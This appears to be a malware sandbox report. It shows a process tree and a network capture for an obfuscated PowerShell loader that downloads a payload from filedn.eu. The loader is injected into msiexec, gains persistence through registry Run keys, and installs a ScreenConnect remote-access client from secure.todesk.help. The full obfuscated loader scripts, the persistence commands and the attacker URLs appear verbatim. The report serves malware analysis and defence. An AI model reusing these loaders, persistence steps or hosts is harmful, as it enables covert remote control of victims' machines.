HklaLithGS.cueXyphnEvant';$Sandhedsserumer=Levnedsmiddelkontrollen 'SterhKonftTeglt s,vp oadsCiv : Cor/ ork/Udstf ArciHaanlCon.eVoucdVi nnZero.Sekue Fe uUnab/Syenl Gram slbjKitcMP.ro1UnhyI opit ViriHvl FFj.rCGalaHOndsjPreiYHe aA.eac4DataJAutoNI,reRNeurBFrizYBautBB st3Unid4Stat/ inddHesti Ra fTrusfBeg,e yrirArdueCrennSkams SlarSid k insk Pare UndrProk.SklmdEne.s,elep';$Fascineredes=Levnedsmiddelkontrollen ' San>';$Mirounga=Levnedsmiddelkontrollen ' AnoiBl aeA.tix';$Aspring='Imperceptibly';$Wernas='\Intimidity.Alb';Pedelion (Levnedsmiddelkontrollen '.run$gtheG PenLHan,oSmulbVersaBabalS um:SrloAPiddlBrneKLacuo MdeHs rjOHapllcaz ISkafs rteL.mir eurePer.tOmty=Agro$ Ad EHofdNAntivStrr:R gnaEk,aP aboPFi tD,uspaStruTGrova emm+ P e$adelWE.seeMinirrillNCycaAP.isS');Pedelion (Levnedsmiddelkontrollen 'Pinu$ onfGva el nto.polb.ilbaUpholChe : .ulEPrelO Un.NMet,iAf iSallaM Do S Vic=Ha e$Afbls nsha ennF.atDF mshSeclE Tridkon,SBi.oS Emme,utir vauSepaMMargEMickrBek,. UndSHegePS bhlAnstiDistTcopa(Boos$TinsF me a aglS aadcPreri BlanFellEholorPiale ArodInvaeSimpSIn,u)');Pedelion (Levnedsmiddelkontrollen $Phrenologists);$Sandhedsserumer=$Eonisms[0];$dommerkendelsernes=(Levnedsmiddelkontrollen 'Komp$DizzG,rkilcorrOTrifb obbA,elolTram:Sce ITvedtBoniE .ifrMimiaT,rpTResseE uiLMarkYOkse=AssenSwerePantWReav-GtteOBgebBTri.jConverecoc kaT Pe. Am eSPa.tyPo,ts relTSvinEne,rM Epi.Pr,o$GaliSKingH BrniLa nL PadIForpNUncegBewiI');Pedelion ($dommerkendelsernes);Pedelion (Levnedsmiddelkontrollen 'Extr$cistICl.rt .leeNut,r SynaSe ttBrone P.ml CacyChea.D ssHSprieg laasnevd Mase Char GensInad[ An $Glacl We eW odgShedaGruplGatei FfesL.vie NonrNonme Sam] De,=Unit$FemeH Tupest.imMul iHegecYuckiStoirVrdic RaalTi beUnhy1,arm4Cool0');$Seattle=Levnedsmiddelkontrollen 'Porn$airwIMetat,lageRyper DefaPenst lyseBroel LexyHur . ekDCrinoMariwGullnPaaslsacaoFeataQuizdVlt.F,etiiSp ilUnace Fem(Hu o$ narSMurmaPerpnBirgdPorchConneLi edRustsOlivs Rede Nonr ,inuLetfm ShaeIrrarform,Skik$PjevSUn et t no Blor ,oseNemesTimosUnautEnderV nteHaulnR,coe Ca,)';$Storesstrene=$Alkoholiseret;Pedelion (Levnedsmiddelkontrollen 'Bod,$ legGSubjl ,enOArkib R sAOmvelMyel:SharRSl,teSkrolCo ooKichAReguD OpeEArmaDguin2Summ5 Lig4 O r=Cons(LygtTTi,sESer,sintitPike-RevePSikkaFurrTAv.sHHove phe$For.sE,isttjenoDeporIsseE Mi SFjorSP.olTMcfaRstoreSydlNS anES ak)');while (!$Reloaded254) {Pedelion (Levnedsmiddelkontrollen 'Dram$UdbegDat,lEt.noEmanbportaUprclU.by:O erQP ogyUnth= Sys$Unt P BlolfremuSmugkFum kFutue') ;Pedelion $Seattle;Pedelion (Levnedsmiddelkontrollen 'ForkSLuksTNedgA Star AntT um-.ildsOme.L Note Intea.slp Smi Math4');Pedelion (Levnedsmiddelkontrollen 'Libi$GelagCartlUnaco ty BIsotAco eLTrea: MacRBabieJvneLNubioPolyAFcytdTilseAffldFe,t2 Fll5Kamp4Regn=Gill(He,stMandEAvlssN tctTra,-usurPCo,paRi,at Urohpirr Arb$InteSTri.T,gesOShivr R dEjerksPen.S raT S oR BeleFactNR tseBu m)') ;Pedelion (Levnedsmiddelkontrollen ' Ge $InjuGHje lBowloHuspBFlysAOutsLStiv:CyanS numiUdt LAntiIRensc ppeeMannOtrylU udtsMero=Sed,$E.udg ekelmyxoOTotab ipoa ForlOpka:SekrCSantoCry,nAfkvGGesjeStrinAsseI rema C,tlChacN.orsEBrneSNonosRach+Fibe+phot%Be,i$IllgESka.oFluin BemIUbevs UnsmAfpaSVagt. T kC inOops u AfvN UfoT') ;$Sandhedsserumer=$Eonisms[$siliceous]}$Diacetylmorphine=330880;$Termined233=29940;Pedelion (Levnedsmiddelkontrollen 'Sena$ ktig tralSalaO ondBAcidaprivlKome:VaabKAppra,pusr Camt deno dehnCrzeNStnna SmuGBommesymfrVa cNHisteS,de Gene=Spir acgRaceeOptaT O,p-SvigcSchnoMe iNTet TBedee.chnnBetrTGian B ll$Bef.s ProTRus oUd.eRHaldE.iggs Gi s indTpatrrTegnE FarNUdtre');Pedelion (Levnedsmiddelkontrollen 'Hunl$g uegSubclRomeo HelbtaktaCauslEl,c:Gu rC foraMetarUdslr eariC yoaMossg,chieSy.olLacreA sks ntrsSo a Sou =Lyse M dv[BushSDampyDarrsGlaitFolkebalsmp.st.U flCDiptoN ncn ydvInteeShanrPolyt utt]Sild:kar : Id Fse erRescoSydkmTer BRei aUnwisRampe tvl6 Ti,4AntiSHjemtl,nsrB.dei Nitn progLapi(Sgel$ParaK annaTamar KontFaaroAdumntopmnFlgeaKrafg BoreTrikr Komn .rieHatp)');Pedelion (Levnedsmiddelkontrollen 'Lted$U prgSlv.l SepOFiguBG,atA abel St.:Spi.v HanaWharAPamfNI dbITuskNSpo G ngisFupmHprogUV rmsbest Misp=Al.o Sml[ xons UdkYDom s SkatFleteGaram Boe. H.eTPrkeETra X PreT Sap.SpytEAfmnneutycSelso asddGrynIUbehn AveGPuff]Rnne:,als:Indba,iazs K,aCEfteI Du i Squ.R jsGF.rfe edT ProsTilttSe vRHumaiSubwnforigno,c(Semi$choncmasha ManRLu eRQuarI CleaKarbG SadESp rLMa oE NorSM biSSmu )');Pedelion (Levnedsmiddelkontrollen 'Pick$Byn.gTubal ByloAntib fora NotL Tak:A siuTomiNPerib KnoUVareR Rene SmaACeruUSekaC Linr QuaaElmatAncyiAndac andaD izlTyndl trayLumi=Op t$S,krvEn,raStapaforenMicrIKa,vn SekgStjlSCu hHOkkeUI ersCep .serisLodeu erbMiliSNon TUnherMaggI UdhnMartGMall( Sh $ StdDD olI slaA Un c amme EliTor,hyUdvilE,spmDrmmOB lir Timp Ku,HZinkIBothn Kone Y,s,.kib$UnmetcentEBe zrToddmperii ocN MolE,kanD Gen2 For3Sira3Komm)');Pedelion $Unbureaucratically;"
    1⤵
    • Blocklisted process makes network request
    • Network Service Discovery
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4364
    • C:\Windows\SysWOW64\msiexec.exe
      "C:\Windows\SysWOW64\msiexec.exe"
      2⤵
      • Blocklisted process makes network request
      • Suspicious use of NtCreateThreadExHideFromDebugger
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:3712
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Galgebakkernes.cmd" "
        3⤵
        • System Location Discovery: System Language Discovery
        PID:4868
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Antheraea" /t REG_EXPAND_SZ /d "%Abondance% -windowstyle 1 $Cotabulate=(gp -Path 'HKCU:\Software\Lascars\').Svartsiderne;%Abondance% ($Cotabulate)"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:4224
        • C:\Windows\SysWOW64\reg.exe
          REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Antheraea" /t REG_EXPAND_SZ /d "%Abondance% -windowstyle 1 $Cotabulate=(gp -Path 'HKCU:\Software\Lascars\').Svartsiderne;%Abondance% ($Cotabulate)"
          4⤵
          • Adds Run key to start application
          • System Location Discovery: System Language Discovery
          • Modifies registry key
          PID:3308
  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Sulciform Sheephead Datovekslen Aliped #><#Unfulfilled Tibbu Domptr Aftereye Blizz #>$Hydropolyp='Stempellovenes';function Matranee($Pseudocyclosis){If ($host.DebuggerEnabled) {$Mineraloliernes=4} for ($Phenanthrene=$Mineraloliernes;;$Phenanthrene+=5){if(!$Pseudocyclosis[$Phenanthrene]) { break }$Quods+=$Pseudocyclosis[$Phenanthrene]}$Quods}function Oratoriske($jennifers){ .($Fugtigvarmes) ($jennifers)}$Sortermulighedens=Matranee 'PerinMisfE pliTSt.l.overWFotoeordsBVe,ec.esoLVirkiThisEOutbnHomoT';$Svinget=Matranee 'StedM.agroK ntzSpooiZayil TollButta.ata/';$Propupa=Matranee 'NotaTSt fl FinsAfst1Spad2';$Reactivations220='suit[F.ydnPen,e FoltNor,. FilSFlagEPotsrBevgVEs.diRetrc SleE RespSchoORatii G.on SkitTikmMPizeaNonpNSupea hrgBlueeUndeRdann]pseu:Tran:negeSVaa ePhrec De UForsrShipiVietT Te yTraspMaanR Pr,oPinuT.ondO .ulCEnkeOElveLTown=H rs$HoroP .orRP,ckOVidrPAnglUF.rrp artA';$Svinget+=Matranee 'Mea 5Adha.Gen.0 el Livs(NairWForpiJenhnUn ad VisoEstrwSupesArti Fe eNRampTGrie Disc1Udsl0Dksk.Jo f0Fixe; Rea DueW.egliHindnAfsk6 Vis4Brmm; S n D.ax Ls,6Best4U ex; Gyn MigrrAfdav Byb:Om a1Soci3Part1Opiu.Ma a0Dag )Rhap L ngGfineeSkolc ailkHexaoCo,d/Tena2 llo0Skov1Shak0Pi,c0S up1Inci0Kons1 rse JvniF Snai inarSquie potfOutdoBofoxF du/Slyn1.isc3Au t1 Sel.Udda0';$vedhnget=Matranee ' MilUe poSr,maEMundRMor.- E sABr pGEtr,e Paan HalT';$Yephede=Matranee 'Rillhfilot psptrefepForss St,:mili/Bioc/ brnfM toi anolOrgaePhotdAfsln Sem. SkaeWontuPerg/ istlAutomStorjInt,MMimb1PuppIIl.otC dbiPlusFDirtCPaavHkarrjWitcYFo,fAIns 4Ac iJFoneNInapRO erBAbutYAperBReit3Fleh4kbst/Fagov,undiDefieUncot PrenStana Se mmisv.Galat Milt Kphf';$Kapitulant=Matranee 'Cusc>';$Fugtigvarmes=Matranee 'F,lmiPeixESuk x';$Demotes='Duperede';$Natvgterstat='\Landbrugslovenes201.spr';Oratoriske (Matranee 'Caus$ TragAldeLSys oAsseblyseaYderLDele: ParFRyaeo,eksRw rcl K lyOraiS.otoTBe ye lanl igasS.igE K nsOve SVindy FloGFernt ,je= Ben$MaitE S.rnTic vNett: ahaForbpK biPTrskDPe,fAEl qtFe tASile+Bi.e$Kli N Plea FlotNonrvEulaGCrimt An EKak,rSvarsTragtSat.ANuclT');Oratoriske (Matranee 'Land$TrusGUdl.lAktiO goab StaA ftelPhot:KkkegSeedUForlMLubrmSor I SubH HonJ mi.uBerulWhipE U st SdeSInfe=El,k$S.miYAchrEDidePkabiHDdsdE Co.dReane hav.kuliSB.odP AstLu.deI .ontPri,(Magt$,ociKenqua eplP AffIImpuTscisu Su.lCon ABla NO tiTErst)');Oratoriske (Matranee $Reactivations220);$Yephede=$Gummihjulets[0];$Prepender=(Matranee 'F,st$CeleGKlevLNat,oFng B,ntiAHec.LD ce:PseufGnosiBrugn KriiC traEftelUnde=gr.pNRus,e forWGrov- AfkO ElaBTareJSlineVirkcBerrtCons PentsenclYEmicsCowltMaroEMassmDyst.Bede$EncuSInkaolactrConctUdtrE Ap rBagsMIncoU F.rL kooIFamiGSvunhB tie Ud DEnameBag nfo kS');Oratoriske ($Prepender);Oratoriske (Matranee ' Fre$Ska,FVenti ygnnDom,i Mugahyl.l O e. UndH atheAfruaS mfd De eAfslrBrudsdiso[Cre $skrdvServeblo dKapehInt nSubcgFrade EpitWere] Ker=Stib$ fsvSSkolvBe eiQuidnA prgGeneeSl,tt');$Downsteepy=Matranee ' Pol$RecaFWar i Subnw,iniBenzaPhonlKrys. GjoD,elgoBar w,enonBr llVandoParaaC rkds rvFMakuiAngulD ese A t(Nonh$KoksY emaeFarmpOverhInfieInfldF ale.van, pec$U.dePInd.rAssaoelengOverr R naServmDomss SlayDelfs TimtAcceeDd imOutseTjrnrCrysnInsteKontsWass)';$Programsystemernes=$Forlystelsessygt;Oratoriske (Matranee ' .ru$Swi gBenaLAld.o.kieb PriaMisclRedi:DyresLikvAPhylM SigLHy oiFo uVOlavS ttef Appo ProRStadh,ondoGiggl k nDep,ie ca.NDredEAdmiSFa e=Snea(Ind TTvrmEdelpsAport bro-TriupDig A.yttT solHPlad Br,g$ArsePUpasRRe poFul GPer ROpgaABj gMtir SInt YBy,dS Tr tPredESjokm LunEOutsrHol nOptieNongsTus )');while (!$Samlivsforholdenes) {Oratoriske (Matranee 'Goth$Non.gBorglSammoFeltbCi.uaF lolChap:KommHHenryO.erpHelveKonsr C,no eksx Logy enogHjere ftenAp liUdvisBudgeFrum=Slud$NordPIronh,hrie,ectnGkkeaUndenPra,tDoorhKu irMedie Udsn mageFabunP aip P.euNo.etH sss LortBroanS kkiHjo.n B,agSkrys') ;Oratoriske $Downsteepy;Oratoriske (Matranee 'AcidSFoldtFalla NyhrIn,etRefr-HalvSReirlPs,kem trE strpKrel Rhyn4');Oratoriske (Matranee 'Basi$ EmaGVaanlReveo,xciBEvanaAbo LPai.:V ndS AbeAStteMVoldl amfIboolvSha.ST pef depop.osRPuckHSubaoPerflDuodd armEDefiN Aa,eSalgSHenr=Uni.(FeritFgteeHospSsikkt sla- holPAcriAUdbatSwi hAn,u Need$krlip si RDaglOKalfg anRBibeaCaecm GassEremy PlesPu,kT rdeECadmM ypledommRPlannRes e SkeS yth)') ;Oratoriske (Matranee ' Hyp$SkrlG Begl SkuOGranBjoula entLArka:Skuefg nkASkjorKratVK kke skrLPatrAHyd D,andehje RAsa NA.skE Und=sv m$Melog OpbLAfs.Om.taBCafaAAlmel Re :S inUAi fD FinRUdtoE CymdTorgE inLImpisS ineOri rUndenUig,EThanSFors+Eska+Pa,e%Cent$ KnuGmyloU O eM ,alMOverIConcHChi JHoldUAbr.LforsEblanTTanksFot,. SelCMultOElituAmernNonct') ;$Yephede=$Gummihjulets[$Farveladerne]}$Annekteret42=299776;$Tentorial=31265;Oratoriske (Matranee ' Pan$Ecceg Br lAnkeoanliB M lAE islGuts:StikSFardmReplaInteA pheSMul KnonrO Me,VG anePaganO,blESustSBol. Su,=Unde Vi GSku.EPlayT Unp-O,bic rroUnmenNe sT AbaeB,azNT.aaT Plo Eje $ C.mPUddaR RatoOctegBdrmRDaarAFo,smBucosFaluYFoyaSFristLdgoe HypML geEMindrDsn NEmbuE ejs');Oratoriske (Matranee ' Ove$ HjegOst lV lko DvabSelvaEjstlhet : UndMEkspaAppes .likTra i,asvn Ca,tUdsviKonddcabb Proj=Shet Mar[Sur.S LgeyPreasVirktSzl.eVandmCard.,rolCSerboTrngn Birv ate Botrrundt,ymn]In e:Pil :BidsFSkinrOpsto premibr BGu daSamasOunceCa,t6Tea 4Sku SSylltNonir ZiriTelen.ajogInda( S,u$ iriSDopimRemia.reeaBenzs Lisk UndoCostv V seSkrinOdiseSpidsi it)');Oratoriske (Matranee 'Fuks$SeptgCantlProvO anbGramARedeL ong:PhrademboI AhaA I tPHer,EL euRho eS Ind1,tal4K ea2Niff Sier=B ck Sha[ AvnsKrn yPrevSS lvTRn eERataMS,te.letuTIndkeRuskxChrotCabi.TeraE IsoNUrt,CGenboB eddDownIToriNSup gWarm]Trim: Sou:Hem aFor,sHaa cProtiUdv,i im.Str,G.lasENegrTEf,eSAv rTKalmRKongiE panPudeg Ka.(Deri$M,liM,ereABortsu fekMomsi HydnDweetWoozI erud dup)');Oratoriske (Matranee 'Moon$Indvg TorlSan oMagnbPillASveslStat:Blo.vAlcaEK lllOs uaLoxotLatheMarqDY te=Berk$ V jDOveriFor a TerpIn,eeTetrr P,lS U,b1 Reg4Unal2 Hyd.BogtSFor UPladBPeptSMasstForeRVindiIn pNQuirgAfre( Fac$Sky,AS ccNbalanTidseSp.tKApp,TContEQuinrTrykeCacotbrug4Ina.2Demi,Vehe$Tankt B,leUvitn.mboTAccooEastREupni OutAhurtLOm l)');Oratoriske $Velated;"
    1⤵
    • Command and Scripting Interpreter: PowerShell
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1984
    • C:\Windows\SysWOW64\msiexec.exe
      "C:\Windows\SysWOW64\msiexec.exe"
      2⤵
      • Blocklisted process makes network request
      • Suspicious use of NtCreateThreadExHideFromDebugger
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:4700
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Naborets.vbs"
        3⤵
        • System Location Discovery: System Language Discovery
        PID:4924
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Meteorologis" /t REG_EXPAND_SZ /d "%Craniosacral% -windowstyle 1 $Excerebration=(gp -Path 'HKCU:\Software\Believes\').Indfoejes;%Craniosacral% ($Excerebration)"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:3104
        • C:\Windows\SysWOW64\reg.exe
          REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Meteorologis" /t REG_EXPAND_SZ /d "%Craniosacral% -windowstyle 1 $Excerebration=(gp -Path 'HKCU:\Software\Believes\').Indfoejes;%Craniosacral% ($Excerebration)"
          4⤵
          • Adds Run key to start application
          • System Location Discovery: System Language Discovery
          • Modifies registry key
          PID:1604
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 4700 -s 2236
        3⤵
        • Program crash
        PID:1932
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 3320 -ip 3320
    1⤵
      PID:1476
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 4700 -ip 4700
      1⤵
        PID:4708

      Network

      • flag-us
        DNS
        secure.todesk.help
        dfsvc.exe
        Remote address:
        8.8.8.8:53
        Request
        secure.todesk.help
        IN A
        Response
        secure.todesk.help
        IN A
        185.49.126.73
      • flag-nl
        GET
        https://secure.todesk.help/Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=api.wisescreen.net&p=8041&s=242614d5-9b0d-42a9-99bd-6fcc80ac8cc3&k=BgIAAACkAABSU0ExAAgAAAEAAQDtQ8jiTjVfazPJSqJ2XEoaqaKFOzZ605yz6hYIv8M7oOnlwfDWfe3v2tUdEO1xGqJdiUZvf4Job0h77N%2f3xyDpec8%2bIXvZFdeEQv6ZmkteD4w4V7CairB78fNaNnQHdATNnOcWXVaX3zjxYIj2eh8cKVFr9wwIps1VKpOM9JTq4tPgXX%2fag0amDzTC1v7aH7ztAJoBRneVdo1mSJod7oL713MYSJAC5clrYHPeJUoCgAhv9UuNovpvt51NjB5FuZvgWP32mCuwprJpolaxfRuswOm879CoUpHd68BExmxShqAn9sLdLjj53kqwsixMTr1whX2%2b2GHRj3Qgw9exO8O8&r=&i=Untitled%20Session
        dfsvc.exe
        Remote address:
        185.49.126.73:443
        Request
        GET /Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=api.wisescreen.net&p=8041&s=242614d5-9b0d-42a9-99bd-6fcc80ac8cc3&k=BgIAAACkAABSU0ExAAgAAAEAAQDtQ8jiTjVfazPJSqJ2XEoaqaKFOzZ605yz6hYIv8M7oOnlwfDWfe3v2tUdEO1xGqJdiUZvf4Job0h77N%2f3xyDpec8%2bIXvZFdeEQv6ZmkteD4w4V7CairB78fNaNnQHdATNnOcWXVaX3zjxYIj2eh8cKVFr9wwIps1VKpOM9JTq4tPgXX%2fag0amDzTC1v7aH7ztAJoBRneVdo1mSJod7oL713MYSJAC5clrYHPeJUoCgAhv9UuNovpvt51NjB5FuZvgWP32mCuwprJpolaxfRuswOm879CoUpHd68BExmxShqAn9sLdLjj53kqwsixMTr1whX2%2b2GHRj3Qgw9exO8O8&r=&i=Untitled%20Session HTTP/1.1
        Host: secure.todesk.help
        Accept-Encoding: gzip
        Connection: Keep-Alive
        Response
        HTTP/1.1 200 OK
        Cache-Control: private
        Content-Length: 53165
        Content-Type: application/x-ms-application; charset=utf-8
        Content-Encoding: gzip
        Server: Microsoft-HTTPAPI/2.0
        X-Robots-Tag: noindex
        X-Content-Type-Options: nosniff
        Date: Fri, 06 Dec 2024 16:04:34 GMT
      • flag-nl
        GET
        https://secure.todesk.help/Bin/ScreenConnect.Client.manifest
        dfsvc.exe
        Remote address:
        185.49.126.73:443
        Request
        GET /Bin/ScreenConnect.Client.manifest HTTP/1.1
        Host: secure.todesk.help
        Accept-Encoding: gzip
        Response
        HTTP/1.1 200 OK
        Cache-Control: private
        Content-Length: 6237
        Content-Type: text/html
        Content-Encoding: gzip
        Server: Microsoft-HTTPAPI/2.0
        X-Robots-Tag: noindex
        X-Content-Type-Options: nosniff
        Date: Fri, 06 Dec 2024 16:04:34 GMT
      • flag-nl
        GET
        https://secure.todesk.help/Bin/ScreenConnect.ClientService.exe
        dfsvc.exe
        Remote address:
        185.49.126.73:443
        Request
        GET /Bin/ScreenConnect.ClientService.exe HTTP/1.1
        Host: secure.todesk.help
        Accept-Encoding: gzip
        Response
        HTTP/1.1 200 OK
        Cache-Control: private
        Content-Length: 95512
        Content-Type: text/html
        Server: Microsoft-HTTPAPI/2.0
        X-Robots-Tag: noindex
        X-Content-Type-Options: nosniff
        Date: Fri, 06 Dec 2024 16:04:35 GMT
      • flag-nl
        GET
        https://secure.todesk.help/Bin/ScreenConnect.WindowsBackstageShell.exe
        dfsvc.exe
        Remote address:
        185.49.126.73:443
        Request
        GET /Bin/ScreenConnect.WindowsBackstageShell.exe HTTP/1.1
        Host: secure.todesk.help
        Accept-Encoding: gzip
        Response
        HTTP/1.1 200 OK
        Cache-Control: private
        Content-Length: 61208
        Content-Type: text/html
        Server: Microsoft-HTTPAPI/2.0
        X-Robots-Tag: noindex
        X-Content-Type-Options: nosniff
        Date: Fri, 06 Dec 2024 16:04:35 GMT
      • flag-nl
        GET
        https://secure.todesk.help/Bin/ScreenConnect.WindowsFileManager.exe.config
        dfsvc.exe
        Remote address:
        185.49.126.73:443
        Request
        GET /Bin/ScreenConnect.WindowsFileManager.exe.config HTTP/1.1
        Host: secure.todesk.help
        Accept-Encoding: gzip
        Response
        HTTP/1.1 200 OK
        Cache-Control: private
        Content-Length: 266
        Content-Type: text/html
        Server: Microsoft-HTTPAPI/2.0
        X-Robots-Tag: noindex
        X-Content-Type-Options: nosniff
        Date: Fri, 06 Dec 2024 16:04:35 GMT
      • flag-nl
        GET
        https://secure.todesk.help/Bin/ScreenConnect.WindowsClient.exe.config
        dfsvc.exe
        Remote address:
        185.49.126.73:443
        Request
        GET /Bin/ScreenConnect.WindowsClient.exe.config HTTP/1.1
        Host: secure.todesk.help
        Accept-Encoding: gzip
        Response
        HTTP/1.1 200 OK
        Cache-Control: private
        Content-Length: 266
        Content-Type: text/html
        Server: Microsoft-HTTPAPI/2.0
        X-Robots-Tag: noindex
        X-Content-Type-Options: nosniff
        Date: Fri, 06 Dec 2024 16:04:35 GMT
      • flag-nl
        GET
        https://secure.todesk.help/Bin/ScreenConnect.WindowsBackstageShell.exe.config
        dfsvc.exe
        Remote address:
        185.49.126.73:443
        Request
        GET /Bin/ScreenConnect.WindowsBackstageShell.exe.config HTTP/1.1
        Host: secure.todesk.help
        Accept-Encoding: gzip
        Response
        HTTP/1.1 200 OK
        Cache-Control: private
        Content-Length: 266
        Content-Type: text/html
        Server: Microsoft-HTTPAPI/2.0
        X-Robots-Tag: noindex
        X-Content-Type-Options: nosniff
        Date: Fri, 06 Dec 2024 16:04:35 GMT
      • flag-nl
        GET
        https://secure.todesk.help/Bin/ScreenConnect.WindowsFileManager.exe
        dfsvc.exe
        Remote address:
        185.49.126.73:443
        Request
        GET /Bin/ScreenConnect.WindowsFileManager.exe HTTP/1.1
        Host: secure.todesk.help
        Accept-Encoding: gzip
        Response
        HTTP/1.1 200 OK
        Cache-Control: private
        Content-Length: 81688
        Content-Type: text/html
        Server: Microsoft-HTTPAPI/2.0
        X-Robots-Tag: noindex
        X-Content-Type-Options: nosniff
        Date: Fri, 06 Dec 2024 16:04:35 GMT
      • flag-nl
        GET
        https://secure.todesk.help/Bin/ScreenConnect.Windows.dll
        dfsvc.exe
        Remote address:
        185.49.126.73:443
        Request
        GET /Bin/ScreenConnect.Windows.dll HTTP/1.1
        Host: secure.todesk.help
        Accept-Encoding: gzip
        Response
        HTTP/1.1 200 OK
        Cache-Control: private
        Content-Length: 845325
        Content-Type: text/html
        Content-Encoding: gzip
        Server: Microsoft-HTTPAPI/2.0
        X-Robots-Tag: noindex
        X-Content-Type-Options: nosniff
        Date: Fri, 06 Dec 2024 16:04:35 GMT
      • flag-nl
        GET
        https://secure.todesk.help/Bin/ScreenConnect.WindowsClient.exe
        dfsvc.exe
        Remote address:
        185.49.126.73:443
        Request
        GET /Bin/ScreenConnect.WindowsClient.exe HTTP/1.1
        Host: secure.todesk.help
        Accept-Encoding: gzip
        Response
        HTTP/1.1 200 OK
        Cache-Control: private
        Content-Length: 602392
        Content-Type: text/html
        Server: Microsoft-HTTPAPI/2.0
        X-Robots-Tag: noindex
        X-Content-Type-Options: nosniff
        Date: Fri, 06 Dec 2024 16:04:37 GMT
      • flag-nl
        GET
        https://secure.todesk.help/Bin/ScreenConnect.Client.dll
        dfsvc.exe
        Remote address:
        185.49.126.73:443
        Request
        GET /Bin/ScreenConnect.Client.dll HTTP/1.1
        Host: secure.todesk.help
        Accept-Encoding: gzip
        Response
        HTTP/1.1 200 OK
        Cache-Control: private
        Content-Length: 98983
        Content-Type: text/html
        Content-Encoding: gzip
        Server: Microsoft-HTTPAPI/2.0
        X-Robots-Tag: noindex
        X-Content-Type-Options: nosniff
        Date: Fri, 06 Dec 2024 16:04:37 GMT
      • flag-nl
        GET
        https://secure.todesk.help/Bin/ScreenConnect.ClientService.dll
        dfsvc.exe
        Remote address:
        185.49.126.73:443
        Request
        GET /Bin/ScreenConnect.ClientService.dll HTTP/1.1
        Host: secure.todesk.help
        Accept-Encoding: gzip
        Response
        HTTP/1.1 200 OK
        Cache-Control: private
        Content-Length: 31927
        Content-Type: text/html
        Content-Encoding: gzip
        Server: Microsoft-HTTPAPI/2.0
        X-Robots-Tag: noindex
        X-Content-Type-Options: nosniff
        Date: Fri, 06 Dec 2024 16:04:37 GMT
      • flag-nl
        GET
        https://secure.todesk.help/Bin/ScreenConnect.Core.dll
        dfsvc.exe
        Remote address:
        185.49.126.73:443
        Request
        GET /Bin/ScreenConnect.Core.dll HTTP/1.1
        Host: secure.todesk.help
        Accept-Encoding: gzip
        Response
        HTTP/1.1 200 OK
        Cache-Control: private
        Content-Length: 220396
        Content-Type: text/html
        Content-Encoding: gzip
        Server: Microsoft-HTTPAPI/2.0
        X-Robots-Tag: noindex
        X-Content-Type-Options: nosniff
        Date: Fri, 06 Dec 2024 16:04:37 GMT
      • flag-us
        DNS
        97.17.167.52.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        97.17.167.52.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        21.49.80.91.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        21.49.80.91.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        73.126.49.185.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        73.126.49.185.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        23.159.190.20.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        23.159.190.20.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        95.221.229.192.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        95.221.229.192.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        api.wisescreen.net
        ScreenConnect.ClientService.exe
        Remote address:
        8.8.8.8:53
        Request
        api.wisescreen.net
        IN A
        Response
        api.wisescreen.net
        IN A
        185.49.126.73
      • flag-us
        DNS
        filedn.eu
        msiexec.exe
        Remote address:
        8.8.8.8:53
        Request
        filedn.eu
        IN A
        Response
        filedn.eu
        IN A
        45.131.244.47
      • flag-ch
        GET
        https://filedn.eu/lmjM1ItiFCHjYA4JNRBYB34/differensrkker.dsp
        powershell.exe
        Remote address:
        45.131.244.47:443
        Request
        GET /lmjM1ItiFCHjYA4JNRBYB34/differensrkker.dsp HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
        Host: filedn.eu
        Connection: Keep-Alive
        Response
